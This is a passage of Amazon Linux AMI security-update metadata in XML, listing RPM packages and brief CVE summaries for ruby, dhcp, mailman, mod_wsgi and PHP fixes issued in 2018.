version="2.3.7" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.7-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3.1-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby23-irb" version="2.3.7" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-irb-2.3.7-1.19.amzn1.noarch.rpm</filename></package><package name="ruby23-devel" version="2.3.7" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-devel-2.3.7-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygems23" version="2.5.2.3" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2.3-1.19.amzn1.noarch.rpm</filename></package><package name="ruby23" version="2.3.7" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.7-1.19.amzn1.i686.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0.1-1.19.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.19.amzn1.i686.rpm</filename></package><package name="ruby23-devel" version="2.3.7" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.7-1.19.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.19.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-1.8.3.1-1.19.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.7" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.7-1.19.amzn1.i686.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.7" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-debuginfo-2.3.7-1.19.amzn1.i686.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.1" release="1.30.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.1-1.30.6.amzn1.noarch.rpm</filename></package><package name="ruby24-irb" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.4-1.30.6.amzn1.noarch.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.4-1.30.6.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.6.amzn1.x86_64.rpm</filename></package><package name="rubygems24" version="2.6.14.1" release="1.30.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.1-1.30.6.amzn1.noarch.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24-devel" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.6.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.6.amzn1.noarch.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.4-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.4-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.4-1.30.6.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.6.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.6.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.6.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.4-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.10" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.10-1.11.amzn1.x86_64.rpm</filename></package><package name="rubygems22" version="2.4.5.2" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5.2-1.11.amzn1.noarch.rpm</filename></package><package name="ruby22-irb" version="2.2.10" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.10-1.11.amzn1.noarch.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8.1-1.11.amzn1.x86_64.rpm</filename></package><package name="ruby22-devel" version="2.2.10" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.10-1.11.amzn1.x86_64.rpm</filename></package><package name="ruby22-libs" version="2.2.10" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.10-1.11.amzn1.x86_64.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.11.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.11.amzn1.x86_64.rpm</filename></package><package name="rubygems22-devel" version="2.4.5.2" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5.2-1.11.amzn1.noarch.rpm</filename></package><package name="ruby22" version="2.2.10" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.10-1.11.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.10" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.10-1.11.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.11.amzn1.i686.rpm</filename></package><package name="ruby22-libs" version="2.2.10" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.10-1.11.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.10" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.10-1.11.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.11.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.10" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.10-1.11.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.10" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.10-1.11.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8.1-1.11.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.31.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-1.31.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-1.31.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-1.31.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-1.31.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-1.31.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-1.31.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.31.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-1.31.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.31.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.31.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.31.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-1.31.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.31.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.31.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-1.31.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-1.31.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-984</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-984: important priority package update for dhcp</title><issued date="2018-04-05 15:52:00" /><updated date="2018-04-05 23:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5733:
A denial of service flaw was found in the way dhcpd handled reference counting when processing client requests. A malicious DHCP client could use this flaw to trigger a reference count overflow on the server side, potentially causing dhcpd to crash, by sending large amounts of traffic.
1549961:
CVE-2018-5733 dhcp: Reference count overflow in dhcpd allows denial of service
CVE-2018-5732:
An out-of-bound memory access flaw was found in the way dhclient processed a DHCP response packet. A malicious DHCP server could potentially use this flaw to crash dhclient processes running on DHCP client machines via a crafted DHCP response packet.
1549960:
CVE-2018-5732 dhcp: Buffer overflow in dhclient possibly allowing code execution triggered by malicious server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5732" title="" id="CVE-2018-5732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5733" title="" id="CVE-2018-5733" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-985</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-985: medium priority package update for mailman</title><issued date="2018-04-05 16:46:00" /><updated date="2018-04-05 23:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5950:
A cross-site scripting (XSS) flaw was found in mailman. An attacker, able to trick the user into visiting a specific URL, can execute arbitrary web scripts on the user&#039;s side and force the victim to perform unintended actions.
1537941:
CVE-2018-5950 mailman: Cross-site scripting (XSS) vulnerability in web UI
CVE-2016-6893:
Cross-site request forgery (CSRF) vulnerability in the user options page in GNU Mailman 2.1.x before 2.1.23 allows remote attackers to hijack the authentication of arbitrary users for requests that modify an option, as demonstrated by gaining access to the credentials of a victim&#039;s account.
1370155:
CVE-2016-6893 mailman: CSRF protection missing in the user options page
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6893" title="" id="CVE-2016-6893" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950" title="" id="CVE-2018-5950" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mailman" version="2.1.15" release="26.21.amzn1" epoch="4" arch="x86_64"><filename>Packages/mailman-2.1.15-26.21.amzn1.x86_64.rpm</filename></package><package name="mailman-debuginfo" version="2.1.15" release="26.21.amzn1" epoch="4" arch="x86_64"><filename>Packages/mailman-debuginfo-2.1.15-26.21.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="26.21.amzn1" epoch="4" arch="i686"><filename>Packages/mailman-2.1.15-26.21.amzn1.i686.rpm</filename></package><package name="mailman-debuginfo" version="2.1.15" release="26.21.amzn1" epoch="4" arch="i686"><filename>Packages/mailman-debuginfo-2.1.15-26.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-987</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-987: medium priority package update for mod24_wsgi</title><issued date="2018-04-26 16:33:00" /><updated date="2018-04-26 21:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8583:
mod_wsgi before 4.2.4 for Apache, when creating a daemon process group, does not properly handle when group privileges cannot be dropped, which might allow attackers to gain privileges via unspecified vectors.
1111034:
CVE-2014-8583 mod_wsgi: failure to handle errors when attempting to drop group privileges
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8583" title="" id="CVE-2014-8583" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_wsgi-python35" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python35-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python36" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python36-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-debuginfo" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-debuginfo-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python26" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python26-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python27" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python27-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python34" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python34-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python35" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-python35-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-python26" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-python26-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-python27" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-python27-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-python36" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-python36-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-debuginfo" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-debuginfo-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-python34" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-python34-3.5-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-988</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-988: medium priority package update for php70 php56</title><issued date="2018-04-05 16:32:00" /><updated date="2018-04-05 23:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7584:
In PHP through 5.6.33, 7.0.x before 7.0.28, 7.1.x through 7.1.14, and 7.2.x through 7.2.2, there is a stack-based buffer under-read while parsing an HTTP response in the php_stream_url_wrap_http_ex function in ext/standard/http_fopen_wrapper.c. This subsequently results in copying a large string.
1551039:
CVE-2018-7584 php: Stack-based buffer under-read in ext/standard/http_fopen_wrapper.c:php_stream_url_wrap_http_ex function when parsing HTTP response allows denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7584" title="" id="CVE-2018-7584" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-mcrypt" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.29" release="1.28.amzn1" epoch="0" 